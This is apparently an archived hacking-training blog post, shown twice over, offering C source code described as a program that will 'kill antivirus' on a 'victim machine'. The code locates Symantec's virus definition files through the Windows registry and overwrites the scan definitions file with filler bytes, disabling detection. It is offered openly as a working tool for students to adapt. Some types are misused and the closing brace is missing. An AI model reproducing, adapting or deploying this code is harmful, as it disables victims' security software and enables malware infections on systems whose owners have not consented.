| Filename | A simple program in C that will kill antivirus program |
| Permission | rw-r--r-- |
| Author | Unknown |
| Date and Time | 12/14/2015 |
| Label | Basic Tutorials |
| Action |
Ethical Hacking Institute in Pune
Sadik Shaikh | Extreme Hacking
Hello friends recently in my CEH(Certified Ethical Hacker) class one of mine student told me that he is finding difficulty in bypassing the antivirus on the victim machine.
So I just gave a thought why not to create a program that will kill antivirus :)
Logic flowed through the mind and the code was executed successfully. This code is for all my dear students, go through the logic and create a new one for yourself. If you find any difficulty in understanding the logical flow you can write me at instructor@arizonainfotech.com.
Here is the code:
#include <windows.h>
int main()
{
HWND Lpbuff;
HKEY handle;
DWORD temp,size;
char buff[255],fName[255],dirName[255];
temp=RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\",0,KEY_READ,&handle);
if(temp!=ERROR_SUCCESS)
return 1;
size=sizeof(buff);
temp=RegQueryValueEx(handle,"CommonFilesDir",0,&temp,buff,&size);
if(temp!=ERROR_SUCCESS)
return 1;
RegCloseKey(handle);
strcat(buff,"\\Symantec Shared\\virusdefs\\");
strcpy(fName,buff);
strcat(buff,"definfo.dat");
SetFileAttributes(buff,FILE_ATTRIBUTE_ARCHIVE);
GetPrivateProfileString("DefDates","CurDefs","",dirName,sizeof(dirName),buff);
if(!strcmp(dirName,""))
return 1;
strcat(fName,dirName);
strcat(fName,"\\VIRSCAN1.DAT");
SetFileAttributes(fName,FILE_ATTRIBUTE_ARCHIVE);
handle=CreateFile(fName,GENERIC_WRITE,FILE_SHARE_READ,NULL,
OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);
if(handle==INVALID_HANDLE_VALUE)
return 1;
size=GetFileSize(handle,&temp)-32;
Lpbuff=GlobalAlloc(GMEM_FIXED,size);
if(!Lpbuff)
{
CloseHandle(handle);
return 1;
}
FillMemory(Lpbuff,size,0x90);
SetFilePointer(handle,32,0,FILE_BEGIN);
WriteFile(handle,Lpbuff,size,&temp,NULL);
CloseHandle(handle);
return 0;
www.extremehacking.org
CEH V9, CHFI, ECSA V9, LPT, TRAINING INSTITUTE IN PUNE
Sadik Shaikh | Extreme Hacking
Hello friends recently in my CEH(Certified Ethical Hacker) class one of mine student told me that he is finding difficulty in bypassing the antivirus on the victim machine.
So I just gave a thought why not to create a program that will kill antivirus :)
Logic flowed through the mind and the code was executed successfully. This code is for all my dear students, go through the logic and create a new one for yourself. If you find any difficulty in understanding the logical flow you can write me at instructor@arizonainfotech.com.
Here is the code:
#include <windows.h>
int main()
{
HWND Lpbuff;
HKEY handle;
DWORD temp,size;
char buff[255],fName[255],dirName[255];
temp=RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\",0,KEY_READ,&handle);
if(temp!=ERROR_SUCCESS)
return 1;
size=sizeof(buff);
temp=RegQueryValueEx(handle,"CommonFilesDir",0,&temp,buff,&size);
if(temp!=ERROR_SUCCESS)
return 1;
RegCloseKey(handle);
strcat(buff,"\\Symantec Shared\\virusdefs\\");
strcpy(fName,buff);
strcat(buff,"definfo.dat");
SetFileAttributes(buff,FILE_ATTRIBUTE_ARCHIVE);
GetPrivateProfileString("DefDates","CurDefs","",dirName,sizeof(dirName),buff);
if(!strcmp(dirName,""))
return 1;
strcat(fName,dirName);
strcat(fName,"\\VIRSCAN1.DAT");
SetFileAttributes(fName,FILE_ATTRIBUTE_ARCHIVE);
handle=CreateFile(fName,GENERIC_WRITE,FILE_SHARE_READ,NULL,
OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);
if(handle==INVALID_HANDLE_VALUE)
return 1;
size=GetFileSize(handle,&temp)-32;
Lpbuff=GlobalAlloc(GMEM_FIXED,size);
if(!Lpbuff)
{
CloseHandle(handle);
return 1;
}
FillMemory(Lpbuff,size,0x90);
SetFilePointer(handle,32,0,FILE_BEGIN);
WriteFile(handle,Lpbuff,size,&temp,NULL);
CloseHandle(handle);
return 0;
www.extremehacking.org
CEH V9, CHFI, ECSA V9, LPT, TRAINING INSTITUTE IN PUNE